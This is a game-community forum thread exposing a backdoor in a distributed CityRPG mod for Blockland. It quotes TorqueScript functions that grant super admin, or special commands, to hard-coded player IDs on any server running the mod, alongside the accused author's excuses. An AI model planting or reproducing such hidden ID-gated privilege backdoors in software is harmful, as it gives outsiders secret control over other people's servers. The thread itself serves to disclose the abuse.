Author Topic: Aoki - Distributing CityRPG with a backdoor, Super admin on all servers using it  (Read 32401 times)

I don't know torquescript, but I think that forgets anyone who kills aoki? Am I wrong? Looks like it raises their wanted level all the way.
All this does is modifies his shape name color.

%color = "0.621495 0.859813 0.976636 1";

No, it makes his name color in-game unique and unchanging. It messes with the gameplay because normally criminal players will have a red name.
So he can do whatever he wants and get awau with it?

The first one is the command Iban put in v1.

function serverCmdtogAdmin(%client)
{
   if(%client.bl_id == 1649)
   {
      %client.isAdmin = (%client.isAdmin ? 0 : 1);
      %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
      commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
      messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
      {
         messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
      }
      else
      {
         messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
      }
   }
}

I changed it to my ID as a joke, this command has been broken since v20 started.

The second ID is to make my name a light blue.

After reading this it has become obvious that the OP knows nothing about Torgue Script, and doesn't realize that I actually work for admin on CityRPG servers.

User was banned for this post
« Last Edit: October 01, 2013, 09:55:29 PM by Badspot »

The first one is the command Iban put in v1.

function serverCmdtogAdmin(%client)
{
   if(%client.bl_id == 1649)
   {
      %client.isAdmin = (%client.isAdmin ? 0 : 1);
      %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
      commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
      messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
      {
         messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
      }
      else
      {
         messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
      }
   }
}

I changed it to my ID as a joke, this command has been broken since v20 started.

The second ID is to make my name a light blue.

After reading this it has become obvious that the OP knows nothing about Torgue Script, and doesn't realize that I actually work for admin on CityRPG servers.
Not that it matters since you've just damned yourself, but A. It's spelled "Torque," B. There's nothing that would prevent that from working, C. Pecon has a pretty good understanding of Torquescript, D. Backdoor admin access isn't a joke - jokes are funny, and E. You should have removed the exploit entirely whether or not you believed it was broken.

Not that it matters since you've just damned yourself, but A. It's spelled "Torque," B. There's nothing that would prevent that from working, C. Pecon has a pretty good understanding of Torquescript, D. Backdoor admin access isn't a joke - jokes are funny, and E. You should have removed the exploit entirely whether or not you believed it was broken.
This.

He was talking about this saying it was a broken joke, and that IBan started this. I even told him he should have removed it completely instead of making all these rps have his ID inside of it.

I doubt he even made it at this point

This is where it gets pretty damn sketchy. Remember in the Original post, when Pecon was mentioning me saying "I give old version of it", I removed the commands in a later version, but the one me and Outpact were working on coding still had it, I was eventually going to remove it. The script is indefinitely broken. Ok, here I found another interesting snippet of code from an older version, this was meant to let Outpact use /rainmari on any server with the mod.

function serverCmdrainMari(%client, %bags)
{
   if(%client.isSuperAdmin || %client.bl_id == 21868) //Outpact's BL_ID this code states that if the user if a Super admin or is outpact, they are aloud to use this.
   {
      %bags = mFloor(%bags);

if(%bags > 0)
      {
         if(%bags > 250)
            %bags = 250;

messageAll('', "\c6It's raining \c2marijuana\c6 near \c3" @ %client.name @ "\c6!");

for(%i = 0; %i <= %bags; %i++)
         {
            %mari = new Item()
            {
               datablock = mariItem;
               value = mFloor(getRandom(2, 5));
               canPickup = false;
            };
            %randomPosition = setWord(%client.player.getTransform(), 2, getWord(%client.player.getTransform(), 2) + 100);
            %randomPosition = setWord(%randomPosition, 0, getRandom(getWord(%randomPosition, 0) - 32, getWord(%randomPosition, 0) + 32));
            %randomPosition = setWord(%randomPosition, 1, getRandom(getWord(%randomPosition, 1) - 32, getWord(%randomPosition, 1) + 32));

%randomTime = getRandom(1, 30) * 1000;

%mari.schedule(%randomTime,"setTransform", %randomPosition);
            MissionCleanup.schedule(%randomTime + 1, "add", %mari);
            %mari.schedule(%randomTime + 2, "setShapeName", (%mari.value @ " grams"));
         }
      }
      else
         messageClient(%client, '', "\c6Please enter a valid number.");
   }
   else
      messageClient(%client, '', "\c6You need to be SuperAdmin to use this function.");
}

For anyone wondering LruteL is Aoki. He's making a half assed attempt at covering his ass right now.

You spelled it the same way I did.

This is where it gets pretty damn sketchy. Remember in the Original post, when Pecon was mentioning me saying "I give old version of it", I removed the commands in a later version, but the one me and Outpact were working on coding still had it, I was eventually going to remove it. The script is indefinitely broken. Ok, here I found another interesting snippet of code from an older version, this was meant to let Outpact use /rainmari on any server with the mod.
So your defense for being an starfish is to say your friend is also an starfish?

You spelled it the same way I did.
Torgue
Torque
Not quite.

For anyone wondering LruteL is Aoki. He's making a half assed attempt at covering his ass right now.

Covering my ass, I have nothing to cover! If you only just read the server.cs...

echo("=========================");
   echo("CityRPG is a splinter project of CityRP after difficulties between Jookia and myself.");
   echo("The intention of this mod was to provide players with the ability to see a block city from block eyes.");
   echo("Of course CityRPG fails on this promise and is merely a really, really forgeted up GameMode for blockland.");
   echo("Although not the best handy-work of code to ever exist this is pretty much my biggest feat that has held together.");
   echo("I enjoyed working with it but can now honestly say I am done.");
   echo("This mod is provided as-is without warranty of functionality.");
   echo("By circumventing this message in server.cs you declare that you are taking this mod for your own self interests and cant blame Iban for how bad it is.");
   echo("=========================");

You would know that CityRPG has many many problems, and it is a private mod (that pecon has just posted a link to/)

The fact that Pecon decided he was going to be a "hero" and go drama me was his first mistake, as the biggest issue here is a leaked DrugsRPG, effectively causing many many more stuffty CityRPGs.

So your defense for being an starfish is to say your friend is also an starfish?
Not quite.

I was merely proving a point, that city RPG mods can be abusive, and that I never intended it to be distributed to the point where people would be offended by the command.

You would know that CityRPG has many many problems, and it is a private mod (that pecon has just posted a link to/)
It's not private. It's half-broken and extremely common.

This isn't really harmful, but I think intent was behind that. (And I am pretty sure that the eval access was achieved via the exploit in the mod, but he could have already been an admin)

EVAL is a stupid add-on I keep finding on a number of CityRPGs it is no "exploit", Though  I do abuse it regularly to try to get hosts to remove it.